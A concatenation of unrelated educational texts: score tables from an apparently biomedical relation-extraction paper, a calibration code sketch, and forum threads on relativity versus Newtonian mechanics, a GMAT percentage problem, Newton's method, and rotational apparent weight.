| Creatine | coronary artery disease | during successful and uncomplicated angioplasty ( ptca ) , we studied the effect of a short lasting myocardial ischemia on plasma creatine kinase , creatine kinase mb-activity , and creatine kinase mm-isoforms ( mm1 , mm2 , mm3 ) in 23 patients . | 0.028 | 0.12 |
| Creatine | coronary artery disease | in 141 patients with acute myocardial infarction , creatine phosphokinase isoenzyme ( cpk-mb ) was determined by the activation method with dithiothreitol ( rao et al. : clin . | 0.027 | 0.117 |
| Morphine | brain cancer | the tissue to serum ratio of morphine in the hypothalamus , hippocampus , striatum , midbrain and cortex were also smaller in morphine tolerant than in non-tolerant rats . | 0.026 | 0.115 |
| Glutathione | anemia | our results suggest that an association between gsh px deficiency and hemolytic anemia need not represent a cause-and-effect relationship . | 0.026 | 0.114 |
| Dinoprostone | stomach cancer | prostaglandin e2 ( pge2 ) - and 6-keto-pgf1 alpha-like immunoactivity was measured in incubates of forestomach and gastric corpus mucosa in ( a ) unoperated rats , ( b ) rats with sham-operation of the kidneys and ( c ) rats with bilateral nephrectomy . | 0.023 | 0.107 |
| Creatine | coronary artery disease | the value of the electrocardiogram in assessing infarct size was studied using serial estimates of the mb isomer of creatine kinase ( ck mb ) in plasma , serial 35 lead praecordial maps in 28 patients with anterior myocardial infarction , and serial 12 lead electrocardiograms in 17 patients with inferior myocardial infarction . | 0.022 | 0.105 |
| Sulfamethazine | multiple sclerosis | quantitation and confirmation of sulfamethazine residues in swine muscle and liver by lc and gc/ms . | 0.017 | 0.093 |
Table 7: Contains the top ten Compound-binds-Gene confidence scores before and after model calibration. Gene mentions are highlighted in blue and compound mentions in red.

| Compound Name | Gene Symbol | Text | Before Calibration | After Calibration |
| --- | --- | --- | --- | --- |
| Cyclic Adenosine Monophosphate | B3GNT2 | in sk-n-mc human neuroblastoma cells , the camp response to 10 nm isoproterenol ( iso ) is mediated primarily by beta 1-adrenergic receptors . | 0.903 | 0.93 |
| Indomethacin | AGT | indomethacin , a potent inhibitor of prostaglandin synthesis , is known to increase the maternal blood pressure response to angiotensin ii infusion . | 0.894 | 0.922 |
| Tretinoin | RXRA | the vitamin a derivative retinoic acid exerts its effects on transcription through two distinct classes of nuclear receptors , the retinoic acid receptor ( rar ) and the retinoid x receptor ( rxr ) . | 0.882 | 0.912 |
| Tretinoin | RXRA | the vitamin a derivative retinoic acid exerts its effects on transcription through two distinct classes of nuclear receptors , the retinoic acid receptor ( rar ) and the retinoid x receptor ( rxr ) . | 0.872 | 0.903 |
| D-Tyrosine | CSF1 | however , the extent of gap tyrosine phosphorylation induced by csf-1 was approximately 10 % of that induced by pdgf-bb in the nih3t3 fibroblasts . | 0.851 | 0.883 |
| D-Glutamic Acid | GLB1 | thus , the negatively charged side chain of glu-461 is important for divalent cation binding to beta-galactosidase . | 0.849 | 0.882 |
| D-Tyrosine | CD4 | second , we use the same system to provide evidence that the physical association of cd4 with the tcr is required for effective tyrosine phosphorylation of the tcr zeta-chain subunit , presumably reflecting delivery of p56lck ( lck ) to the tcr . | 0.825 | 0.859 |
| Calcium Chloride | TNC | the possibility that the enhanced length dependence of ca2 + sensitivity after cardiac tnc reconstitution was attributable to reduced tnc binding was excluded when the length dependence of partially extracted fast fibres was reduced to one-half the normal value after a 50 % deletion of the native tnc . | 0.821 | 0.855 |
| Metoprolol | KCNMB2 | studies in difi cells of the displacement of specific 125i-cyp binding by nonselective ( propranolol ) , beta 1-selective ( metoprolol and atenolol ) , and beta 2-selective ( ici 118-551 ) antagonists revealed only a single class of beta 2-adrenergic receptors . | 0.82 | 0.854 |
| D-Tyrosine | PLCG1 | epidermal growth factor ( egf ) or platelet-derived growth factor binding to their receptor on fibroblasts induces tyrosine phosphorylation of plc gamma 1 and stable association of plc gamma 1 with the receptor protein tyrosine kinase . | 0.818 | 0.851 |
Table 8: Contains the bottom ten Compound-binds-Gene confidence scores before and after model calibration. Gene mentions are highlighted in blue and Compound mentions are highlighted in red.
Compound Name Gene Symbol Text Before Calibration After Calibration
Deferoxamine TF the mechanisms of fe uptake have been characterised using 59fe complexes of citrate , nitrilotriacetate , desferrioxamine , and 59fe added to eagle ’s minimum essential medium ( mem ) and compared with human transferrin ( tf ) labelled with 59fe and iodine-125 . 0.02 0.011
Hydrocortisone GH1 group iv patients had normal basal levels of lh and normal lh , gh and cortisol responses . 0.02 0.011
Carbachol INS at the same concentration , however , iapp significantly ( p less than 0.05 ) inhibited carbachol-stimulated ( 10 ( -7 ) m ) release of insulin by 30 % , and cgrp significantly inhibited carbachol-stimulated release of insulin by 33 % when compared with the control group . 0.02 0.011
Adenosine ME2 at physiological concentrations , atp , adp , and amp all inhibit the enzyme from atriplex spongiosa and panicum miliaceum ( nad-me-type plants ) , with atp the most inhibitory species . 0.019 0.01
Naloxone POMC specifically , opioids , including 2-n-pentyloxy-2-phenyl-4-methyl-morpholine , naloxone , and beta-endorphin , have been shown to interact with il-2 receptors ( 134 ) and regulate production of il-1 and il-2 ( 48-50 , 135 ) . 0.018 0.01
Cortisone acetate POMC sarcoidosis therapy with cortisone and acth – the role of acth therapy . 0.017 0.009
Epinephrine INS thermogenic effect of thyroid hormones : interactions with epinephrine and insulin . 0.017 0.009
Aldosterone KNG1 important vasoconstrictor , fluid - and sodium-retaining factors are the renin-angiotensin-aldosterone system , sympathetic nerve activity , and vasopressin ; vasodilator , volume , and sodium-eliminating factors are atrial natriuretic peptide , vasodilator prostaglandins like prostacyclin and prostaglandin e2 , dopamine , bradykinin , and possibly , endothelial derived relaxing factor ( edrf ) . 0.016 0.008
D-Leucine POMC cross-reactivities of leucine-enkephalin and beta-endorphin with the eia were less than 0.1 % , while that with gly-gly-phe-met and oxidized gly-gly-phe-met were 2.5 % and 10.2 % , respectively . 0.011 0.005
Estriol LGALS1 [ diagnostic value of serial determination of estriol and hpl in plasma and of total estrogens in 24-h-urine compared to single values for diagnosis of fetal danger ] . 0.01 0.005
Table 9: Contains the top ten Gene-interacts-Gene confidence scores before and after model calibration. Both gene mentions are highlighted in blue.
Gene1 Symbol Gene2 Symbol Text Before Calibration After Calibration
ESR1 HSP90AA1 previous studies have suggested that the 90-kda heat shock protein ( hsp90 ) interacts with the er , thus stabilizing the receptor in an inactive state . 0.812 0.864
TP53 TP73 cyclin g interacts with p53 as well as p73 , and its binding to p53 or p73 presumably mediates downregulation of p53 and p73 . 0.785 0.837
TP53 AKT1 treatment of c81 cells with ly294002 resulted in an increase in the p53-responsive gene mdm2 , suggesting a role for akt in the tax-mediated regulation of p53 transcriptional activity . 0.773 0.825
ABCB1 NR1I3 valproic acid induces cyp3a4 and mdr1 gene expression by activation of constitutive androstane receptor and pregnane x receptor pathways . 0.762 0.813
PTH2R PTH2 thus , the juxtamembrane receptor domain specifies the signaling and binding selectivity of tip39 for the pth2 receptor over the pth1 receptor . 0.761 0.812
CCND1 ABL1 synergy with v-abl depended on a motif in cyclin d1 that mediates its binding to the retinoblastoma protein , suggesting that abl oncogenes in part mediate their mitogenic effects via a retinoblastoma protein-dependent pathway . 0.757 0.808
CTNND1 CDH1 these complexes are formed independently of ddr1 activation and of beta-catenin and p120-catenin binding to e-cadherin ; they are ubiquitous in epithelial cells . 0.748 0.798
CSF1 CSF1R this is in agreement with current thought that the c-fms proto-oncogene product functions as the csf-1 receptor specific to this pathway . 0.745 0.795
EZR CFTR without ezrin binding , the cytoplasmic tail of cftr only interacts strongly with the first amino-terminal pdz domain to form a 1:1 c-cftr . 0.732 0.78
SRC PIK3CG we have demonstrated that the sh2 ( src homology 2 ) domains of the 85 kda subunit of pi-3k are sufficient to mediate binding of the pi-3k complex to tyrosine phosphorylated , but not non-phosphorylated il-2r beta , suggesting that tyrosine phosphorylation is an integral component of the activation of pi-3k by the il-2r . 0.731 0.78
Table 10: Contains the bottom ten Gene-interacts-Gene confidence scores before and after model calibration. Both gene mentions are highlighted in blue.
Gene1 Symbol Gene2 Symbol Text Before Calibration After Calibration
AGTR1 ACE result ( s ) : the luteal tissue is the major site of ang ii , ace , at1r , and vegf , with highest staining intensity found during the midluteal phase and at pregnancy . 0.009 0.003
ABCE1 ABCF2 in relation to normal melanocytes , abcb3 , abcb6 , abcc2 , abcc4 , abce1 and abcf2 were significantly increased in melanoma cell lines , whereas abca7 , abca12 , abcb2 , abcb4 , abcb5 and abcd1 showed lower expression levels . 0.008 0.002
IL4 IFNG in contrast , il-13ralpha2 mrna expression was up-regulated by ifn-gamma plus il-4 . 0.007 0.002
FCAR CD79A we report here the presence of circulating soluble fcalphar ( cd89 ) - iga complexes in patients with igan . 0.007 0.002
IL4 VCAM1 similarly , il-4 induced vcam-1 expression and augmented tnf-alpha-induced expression on huvec but did not affect vcam-1 expression on hdmec . 0.007 0.002
IL2 IFNG prostaglandin e2 at priming of naive cd4 + t cells inhibits acquisition of ability to produce ifn-gamma and il-2 , but not il-4 and il-5 . 0.006 0.002
IL2 FOXP3 il-1b promotes tgf-b1 and il-2 dependent foxp3 expression in regulatory t cells . 0.006 0.002
IL2 IFNG the detailed distribution of lymphokine-producing cells showed that il-2 and ifn-gamma-producing cells were located mainly in the follicular areas . 0.005 0.001
IFNG IL10 results : we found weak mrna expression of interleukin-4 ( il-4 ) and il-5 , and strong expression of il-6 , il-10 and ifn-gamma before therapy . 0.005 0.001
PIK3R1 PTEN both pten ( pi3k antagonist ) and pp2 ( unspecific phosphatase ) were down-regulated . 0.005 0.001
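The "Before Calibration" and "After Calibration" columns in Tables 7-10 come from a score-calibration step that maps raw model confidences onto better-behaved probabilities. As a minimal sketch of how such a step can work, assuming Platt scaling (a logistic map fitted on held-out labels; the paper's actual calibration procedure may differ), in Python:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# Held-out raw model scores and true labels (toy values, purely illustrative).
raw_scores = np.array([0.02, 0.15, 0.40, 0.65, 0.82, 0.97]).reshape(-1, 1)
labels     = np.array([0,    0,    0,    1,    1,    1])

# Platt scaling: fit sigmoid(a * score + b) to the held-out labels.
platt = LogisticRegression()
platt.fit(raw_scores, labels)

# Map new raw scores to calibrated probabilities, analogous to the
# "Before Calibration" -> "After Calibration" columns above.
before = np.array([[0.903], [0.02]])
after = platt.predict_proba(before)[:, 1]
print(after)
```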
### Top Ten Sentences for Each Edge Type
Table 11: Contains the top ten predictions for each edge type. Highlighted words represent entities mentioned within the given sentence.
Edge Type Source Node Target Node Generative Model Prediction Discriminative Model Prediction Number of Sentences In Hetionet Text
DaG urinary bladder cancer TP53 1 0.945 2112 Existing conclusion : our findings indicate that the dsp53-285 can upregulate wild-type p53 expression in human bladder cancer cells through rna activation , and suppresses cells proliferation and metastasis in vitro and in vivo .
DaG ovarian cancer EGFR 1 0.937 1330 Existing conclusion : our data showed that increased expression of egfr is associated with poor prognosis of patients with eoc and dacomitinib may act as a novel , useful chemotherapy drug .
DaG stomach cancer TP53 1 0.937 2679 Existing conclusion : this meta-analysis suggests that p53 arg72pro polymorphism is associated with increased risk of gastric cancer in asians .
DaG lung cancer TP53 1 0.936 6813 Existing conclusion : these results suggest that high expression of the p53 oncoprotein is a favorable prognostic factor in a subset of patients with nsclc .
DaG breast cancer TCF7L2 1 0.936 56 Existing this meta-analysis demonstrated that tcf7l2 gene polymorphisms ( rs12255372 and rs7903146 ) are associated with an increased susceptibility to breast cancer .
DaG skin cancer COX2 1 0.935 73 Novel elevated expression of cox-2 has been associated with tumor progression in skin cancer through multiple mechanisms .
DaG thyroid cancer VEGFA 1 0.933 592 Novel as a conclusion , we suggest that vegf g +405 c polymorphism is associated with increased risk of ptc .
DaG stomach cancer EGFR 1 0.933 1237 Existing recently , high lymph node ratio is closely associated with egfr expression in advanced gastric cancer .
DaG liver cancer GPC3 1 0.933 1944 Novel conclusions serum gpc3 was overexpressed in hcc patients .
DaG stomach cancer CCR6 1 0.931 24 Novel the cox regression analysis showed that high expression of ccr6 was an independent prognostic factor for gc patients .
CtD Sorafenib liver cancer 1 0.99 6672 Existing tace plus sorafenib for the treatment of hepatocellular carcinoma : final results of the multicenter socrates trial .
CtD Methotrexate rheumatoid arthritis 1 0.989 14546 Existing comparison of low-dose oral pulse methotrexate and placebo in the treatment of rheumatoid arthritis .
CtD Auranofin rheumatoid arthritis 1 0.988 419 Existing auranofin versus placebo in the treatment of rheumatoid arthritis .
CtD Lamivudine hepatitis B 1 0.988 6709 Existing randomized controlled trials ( rcts ) comparing etv with lam for the treatment of hepatitis b decompensated cirrhosis were included .
CtD Doxorubicin urinary bladder cancer 1 0.988 930 Existing 17-year follow-up of a randomized prospective controlled trial of adjuvant intravesical doxorubicin in the treatment of superficial bladder cancer .
CtD Docetaxel breast cancer 1 0.987 5206 Existing currently , randomized phase iii trials have demonstrated that docetaxel is an effective strategy in the adjuvant treatment of breast cancer .
CtD Cimetidine psoriasis 0.999 0.987 12 Novel cimetidine versus placebo in the treatment of psoriasis .
CtD Olanzapine schizophrenia 1 0.987 3324 Novel a double-blind , randomised comparative trial of amisulpride versus olanzapine in the treatment of schizophrenia : short-term results at two months .
CtD Fulvestrant breast cancer 1 0.987 826 Existing phase iii clinical trials have demonstrated the clinical benefit of fulvestrant in the endocrine treatment of breast cancer .
CtD Pimecrolimus atopic dermatitis 1 0.987 531 Existing introduction : although several controlled clinical trials have demonstrated the efficacy and good tolerability of 1 % pimecrolimus cream for the treatment of atopic dermatitis , the results of these trials may not apply to real-life usage .
CbG Gefitinib EGFR 1 0.99 8746 Existing morphologic features of adenocarcinoma of the lung predictive of response to the epidermal growth factor receptor kinase inhibitors erlotinib and gefitinib .
CbG Adenosine EGFR 1 0.987 644 Novel it is well established that inhibiting atp binding within the egfr kinase domain regulates its function .
CbG Rosiglitazone PPARG 1 0.987 1498 Existing rosiglitazone is a potent peroxisome proliferator-activated receptor gamma agonist that decreases hyperglycemia by reducing insulin resistance in patients with type 2 diabetes mellitus .
CbG D-Tyrosine INSR 0.998 0.987 1713 Novel this result suggests that tyrosine phosphorylation of phosphatidylinositol 3-kinase by the insulin receptor kinase may increase the specific activity of the former enzyme in vivo .
CbG D-Tyrosine IGF1 0.998 0.983 819 Novel affinity-purified insulin-like growth factor i receptor kinase is activated by tyrosine phosphorylation of its beta subunit .
CbG Pindolol HTR1A 1 0.983 175 Existing pindolol , a betablocker with weak partial 5-ht1a receptor agonist activity has been shown to produce a more rapid onset of antidepressant action of ssris .
CbG Progesterone SHBG 1 0.981 492 Existing however , dng also elicits properties of progesterone derivatives like neutrality in metabolic and cardiovascular system and considerable antiandrogenic activity , the latter increased by lack of binding to shbg as specific property of dng .
CbG Mifepristone AR 1 0.98 78 Existing ru486 bound to the androgen receptor .
CbG Alfentanil OPRM1 1 0.979 10 Existing purpose : alfentanil is a high potency mu opiate receptor agonist commonly used during presurgical induction of anesthesia .
CbG Candesartan AGTR1 1 0.979 36 Existing tcv-116 is a new , nonpeptide , angiotensin ii type-1 receptor antagonist that acts as a specific inhibitor of the renin-angiotensin system .
GiG BRCA2 BRCA1 0.972 0.984 12257 Novel a total of 9 families ( 16 % ) showed mutations in the brca1 gene , including the one new mutation identified in this study ( 5382insc ) , and 12 families ( 21 % ) presented mutations in the brca2 gene .
GiG MDM2 TP53 0.938 0.978 17128 Existing no mutations in the tp53 gene have been found in samples with amplification of mdm2 .
GiG BRCA1 BRCA2 1 0.978 12257 Existing pathogenic truncating mutations in the brca1 gene were found in two tumor samples with allelic losses , whereas no mutations were identified in the brca2 gene .
GiG KRAS TP53 0.992 0.971 4106 Novel mutations in the p53 gene did not correlate with mutations in the c-k-ras gene , indicating that colorectal cancer can develop through pathways independent not only of the presence of mutations in any of these genes but also of their cooperation .
GiG TP53 HRAS 0.992 0.969 451 Novel pathologic examination of the uc specimens from aa-exposed patients identified heterozygous hras changes in 3 cases , and deletion or replacement mutations in the tp53 gene in 4 .
GiG REN NR1H3 0.998 0.966 8 Novel nuclear receptor lxralpha is involved in camp-mediated human renin gene expression .
GiG ESR2 CYP19A1 0.999 0.96 159 Novel dna methylation , histone modifications , and binding of estrogen receptor , erb to regulatory dna sequences of cyp19a1 gene were evaluated by chromatin immunoprecipitation ( chip ) assay .
GiG RET EDNRB 0.816 0.96 136 Novel mutations in the ret gene , which codes for a receptor tyrosine kinase , and in ednrb which codes for the endothelin-b receptor , have been shown to be associated with hscr in humans .
GiG PKD1 PKD2 1 0.959 1614 Existing approximately 85 % of adpkd cases are caused by mutations in the pkd1 gene , while mutations in the pkd2 gene account for the remaining 15 % of cases .
GiG LYZ CTCF 0.999 0.959 2 Novel in conjunction with the thyroid receptor ( tr ) , ctcf binding to the lysozyme gene transcriptional silencer mediates the thyroid hormone response element ( tre ) - dependent transcriptional repression .
1. Labeled sentences are available here.
|
# Why does Newtonian dynamics break down at the speed of light?
1. Feb 14, 2015
### nisarg
I tried searching the web for this topic but got answers like "formulae used in classical mechanics are approximations or simplifications of more accurate formulae, such as the ones in quantum mechanics and special relativity". My question is: why do the laws of Sir Isaac Newton no longer apply to objects at the speed of light? Is it the formulae that are causing the problem, or the laws?
I really need a detailed explanation to understand this topic thoroughly, so if someone could help me on this, I would be more than grateful.
Thanks
2. Feb 14, 2015
### Borg
Take a look at the Wikipedia article on General Relativity to start. There is a section that explains going from classical Newtonian mechanics to General Relativity.
3. Feb 14, 2015
Staff Emeritus
The laws are low velocity approximations. At higher and higher velocities, the laws get worse and worse.
4. Feb 14, 2015
### DrStupid
Do they? The Galilean transformation fails at the speed of light, but Newton's laws of motion (in their original form) still apply. Whether it makes sense to use forces for photons is another question.
5. Feb 14, 2015
### Staff: Mentor
We just happen to live in a universe where Newtonian physics is not exact. It is perfectly possible to imagine a world where the laws are exact at all speeds (particle physics and some other fields would run into problems, but let's ignore the microscopic part here), but experiments show we do not live in such a world.
Acceleration is not parallel to force in general. How does that agree with Newtonian physics?
6. Feb 14, 2015
### DrStupid
If the Galilean transformation is replaced by the Lorentz transformation, Newton's "quantity of matter" becomes velocity dependent. As a result, acceleration is no longer parallel to force.
7. Feb 14, 2015
### Staff: Mentor
I'm not too experienced with relativity so I'm not sure, but isn't the 4-force parallel to the 4-acceleration (unless the rest mass is changing)?
Chet
8. Feb 14, 2015
### Staff: Mentor
A velocity-dependent scalar mass is not sufficient; you would need some sort of "vector mass". And I think that is beyond Newton's equation of motion. Even the Lorentz transformations on their own are beyond Newton's physics.
9. Feb 14, 2015
### DrStupid
The velocity-dependent scalar mass
$m = \frac{m_0}{\sqrt{1 - \frac{v^2}{c^2}}}$
results in
$a = \left( \frac{F}{m_0} - v \cdot \frac{v \cdot F}{m_0 c^2} \right) \cdot \sqrt{1 - \frac{v^2}{c^2}}$
There is no need for some sort of "vector mass".
Of course it is. That's why I limited my statement to Newton's laws of motion.
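A quick numerical check of the closed form quoted above (an illustrative sketch, not part of the thread; all values arbitrary) confirms that it is exactly what F = dp/dt with p = γm₀v gives, and that a is generally not parallel to F:

```python
import numpy as np

c = 299_792_458.0                      # speed of light, m/s
m0 = 1.0                               # rest mass, kg
v = np.array([0.6 * c, 0.2 * c, 0.0])  # velocity, |v| < c
F = np.array([1.0, 2.0, 3.0])          # applied force, N

root = np.sqrt(1.0 - np.dot(v, v) / c**2)   # = 1/gamma

# The closed form quoted above:
a = (F / m0 - v * np.dot(v, F) / (m0 * c**2)) * root

# F = dp/dt with p = gamma*m0*v expands to
# F = gamma*m0*a + gamma^3*m0*(v.a)/c^2 * v; check that it is satisfied:
gamma = 1.0 / root
F_back = gamma * m0 * a + gamma**3 * m0 * np.dot(v, a) / c**2 * v

print(np.allclose(F_back, F))   # True: the closed form solves F = dp/dt
print(np.cross(F, a))           # nonzero: a is not parallel to F
```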
10. Feb 14, 2015
### Staff: Mentor
Okay, if you add those extra terms - I would not call this "Newton's laws of motion" any more.
11. Feb 14, 2015
### DrStupid
There are no extra terms.
12. Feb 14, 2015
### dextercioby
The 2nd law fails simply because it allows an accelerating object to increase its speed indefinitely, whereas, per currently valid theories and experimental results, nothing in our universe can move at a speed faster than c when its speed is measured in an inertial reference frame.
13. Feb 14, 2015
### Staff: Mentor
Compared to a=F/m?
14. Feb 14, 2015
### DrStupid
Compared to F=dp/dt
15. Feb 14, 2015
Staff Emeritus
You've rolled it into the second term in the pre-factor.
16. Feb 14, 2015
### DrStupid
Which second term of which pre-factor?
17. Feb 14, 2015
Staff Emeritus
The part with the dot product. That makes it directional.
18. Feb 14, 2015
### DrStupid
Are you confusing the equation for acceleration with the equation for quantity of matter (better not to use the term mass here)? The latter does not contain such a part.
19. Feb 14, 2015
### Staff: Mentor
As I said in post number 7, if expressed in terms of the 4-force and 4-acceleration, Newton's second law is recovered intact.
Chet
20. Feb 14, 2015
### brainpushups
Newton made a few assumptions about nature that turned out to be incorrect. For example, Newton's conception of time in the definitions given in the Principia, as a quantity that moves forward independently without regard to motion (I'm paraphrasing here), was questioned later by Mach, who influenced Einstein. Einstein also knew that Maxwell's equations predicted electromagnetic waves that all travel at the same speed... but relative to what? After the rejection of the luminiferous ether, largely due to the Michelson-Morley experiment, Einstein proposed the two postulates of special relativity, one of which is that the speed of light is the same for all observers regardless of their state of motion. One consequence of this postulate (which does not suppose that time runs the same for everyone) is that the amount of time elapsed depends on an observer's state of motion. This and other consequences of special relativity are only important when the speeds of objects approach the speed of light. If the speeds are low, the predictions made by SR reduce to those of Newtonian mechanics.
So, to answer the question: it is the axiomatic assumptions that are "causing the problems".
As others have said, Newton's laws are still applicable in SR if you change the definitions of force and momentum to their four-vector versions. However, in my limited experience with SR, I've noticed that the concept of force (in the Newtonian sense) is not very convenient, simply because of how messy it gets when applying the Lorentz transformations. The form of the laws looks the same when using four-vectors (which is probably one of the reasons four-momentum was defined the way it was!), but I would argue that this isn't really Newton's laws anymore.
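To spell out the four-vector statement from posts 7 and 19 (a standard textbook identity, assuming constant rest mass $m_0$): with proper time $\tau$ and four-velocity $U^\mu = dx^\mu/d\tau$, the four-momentum is $P^\mu = m_0 U^\mu$, and the four-force is $F^\mu = \frac{dP^\mu}{d\tau} = m_0 \frac{dU^\mu}{d\tau} = m_0 A^\mu$. So in four-vector form the "F = ma" structure survives, with the four-force parallel to the four-acceleration and the invariant rest mass as the constant of proportionality.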
|
# A shirt that costs k dollars is increased by 30%, then by an additiona
Math Expert
Joined: 02 Sep 2009
Posts: 55732
A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
19 Aug 2018, 09:42
Difficulty:
5% (low)
Question Stats:
83% (00:54) correct 17% (01:09) wrong based on 67 sessions
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
_________________
VP
Status: Learning stage
Joined: 01 Oct 2017
Posts: 1009
WE: Supply Chain Management (Energy and Utilities)
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
19 Aug 2018, 11:50
Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
Original cost = $k

Price of the shirt is increased by 30%. So, new price of the shirt = $$k(1+\frac{30}{100})=1.3k$$

Again, the price of the shirt is increased by an additional 50%. So, new price of the shirt = $$1.3k(1+\frac{50}{100})=1.3k*1.5=1.95k$$

Ans. (E)
_________________
Regards,
PKN
Rise above the storm, you will find the sunshine

Intern
Joined: 17 Aug 2018
Posts: 18
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]

### Show Tags

19 Aug 2018, 15:55

= k*(1.30)(1.5) = 1.95k

Posted from my mobile device

Board of Directors
Status: QA & VA Forum Moderator
Joined: 11 Jun 2011
Posts: 4504
Location: India
GPA: 3.5
WE: Business Development (Commercial Banking)
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]

### Show Tags

20 Aug 2018, 07:16

Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k

$$30 + 50 + \frac{30*50}{100}$$
$$= 80 + 15$$

So there is a net increase in value of 95%; thus the new price of the shirt in dollar terms is 1.95k. Answer must be (E)
_________________
Thanks and Regards
Abhishek....

Manager
Joined: 20 Jul 2018
Posts: 88
GPA: 2.87
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]

### Show Tags

20 Aug 2018, 08:59

Increased by 30% = 1.3k
Increased by a further 50% = 1.5*1.3k = 1.95k
_________________
Hasnain Afzal
"When you wanna succeed as bad as you wanna breathe, then you will be successful." -Eric Thomas

CEO
Joined: 12 Sep 2015
Posts: 3786
Location: Canada
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]

### Show Tags

24 Jan 2019, 06:51

Top Contributor

Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k

A shirt that costs k dollars is increased by 30%. So, the new cost = k + (30% of k) = k + 0.3k = 1.3k

ASIDE: Increasing a value by 30% is the same as multiplying that value by 1.3. Similarly, increasing a value by 20% is the same as multiplying that value by 1.2, and increasing a value by 78% is the same as multiplying that value by 1.78, etc.

The price is increased by an additional 50%. New price = (1.5)(1.3k) = 1.95k

Answer: E

Cheers,
Brent
_________________
Test confidently with gmatprepnow.com

EMPOWERgmat Instructor
Status: GMAT Assassin/Co-Founder
Affiliations: EMPOWERgmat
Joined: 19 Dec 2014
Posts: 14353
Location: United States (CA)
GMAT 1: 800 Q51 V49
GRE 1: Q170 V170
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]

### Show Tags

26 Jan 2019, 13:39

Hi All,

We're told that the price of a shirt that costs K dollars is increased by 30%, then that price is increased by an additional 50%. We're asked for the final price of the shirt in dollars, in terms of K. This question can be solved in a number of different ways, including algebraically and by TESTing VALUES. Based on the answer choices, though, you can actually answer this question with just a little logic.

Increasing a value by 30% and then increasing that new overall value by 50% is a concept that's sometimes referred to as "interest on top of interest." In simple terms, it means that the overall increase will be greater than the sum of the two individual increases (since the second increase will be based on the prior increased value, and not the starting value). Here, that would mean that the overall increase would be GREATER than 30+50 = 80%. There's only one answer that matches...

Final Answer: (E)

GMAT assassins aren't born, they're made,
Rich
_________________
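Abhishek's $$30 + 50 + \frac{30*50}{100}$$ shortcut and Rich's "interest on top of interest" point are both contained in one expansion of the two multipliers:

$$(1+a)(1+b) = 1 + a + b + ab \;\Rightarrow\; (1.30)(1.50) = 1 + 0.30 + 0.50 + 0.15 = 1.95$$

The cross term ab is why two successive positive increases always beat the simple sum a + b.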
Official GMAT Exam Packs + 70 Pt. Improvement Guarantee
www.empowergmat.com/
SVP
Joined: 26 Mar 2013
Posts: 2237
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
27 Jan 2019, 05:47
Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
Let k = 1000. Price with the 30% increase = 1300. Price with the additional 50% increase = 1950.
Only one answer fits: 1.95k = 1950.
Target Test Prep Representative
Status: Founder & CEO
Affiliations: Target Test Prep
Joined: 14 Oct 2015
Posts: 6590
Location: United States (CA)
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
01 Feb 2019, 18:32
Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
The new price of the shirt is k x 1.3 x 1.5 = 1.95k.
_________________
# Scott Woodbury-Stewart
Founder and CEO
[email protected]
|
## Newton's method

Is the formula $x - \frac{f(x)}{f'(x)}$ (the function divided by the derivative of the function),
or
$x - \frac{f'(x)}{f''(x)}$ (the first derivative divided by the second derivative of the function)?
I've come across some questions that use the first one and also some that use the second one.
thanks
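Both forms are Newton's method, just aimed at different equations: the first solves f(x) = 0 (root finding), while the second is the identical update applied to f'(x) = 0, which is how it appears in optimization exercises. A minimal sketch of both (illustrative, not from the original question):

```python
def newton_root(f, fprime, x0, tol=1e-10, max_iter=50):
    """Solve f(x) = 0 via x <- x - f(x)/f'(x)."""
    x = x0
    for _ in range(max_iter):
        step = f(x) / fprime(x)
        x -= step
        if abs(step) < tol:
            break
    return x

def newton_stationary(fprime, fsecond, x0, tol=1e-10, max_iter=50):
    """Find a stationary point f'(x) = 0 via x <- x - f'(x)/f''(x)."""
    x = x0
    for _ in range(max_iter):
        step = fprime(x) / fsecond(x)
        x -= step
        if abs(step) < tol:
            break
    return x

# Root of f(x) = x^2 - 2  ->  sqrt(2)
print(newton_root(lambda x: x*x - 2, lambda x: 2*x, x0=1.0))

# Minimum of f(x) = (x - 3)^2  ->  3 (the same update applied to f')
print(newton_stationary(lambda x: 2*(x - 3), lambda x: 2.0, x0=0.0))
```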
|
# Change of weight with faster Earth rotation.
#### tkninetyfive
1. Homework Statement
m=55kg
r=6400km
The Earth's rotation increases so that a bathroom scale now reads that you weigh 0.
How long is one "day" on Earth?
2. Homework Equations
I keep trying to figure this one out, but with the different ways I've tried, I put Fg as 0 and it basically negates my whole equation. The section of the course we are on right now is centripetal force and gravitation.
3. The Attempt at a Solution
This is the one "answer" I've gotten, but it seems a little too easy.
Fnet = ma
Fc = mac
Fc = mv^2/r
mg = mv^2/r
g = v^2/r
v = √(rg)
Plug in the radius in metres and 9.8 for g to get v, and then solve t = 2πr/v, which is the same as t = d/v.
any help? :(
#### AJ Bentley
Quite right.
Initial weight = mg = 55*9.81 Newtons
Centripetal force = mv^2/r.
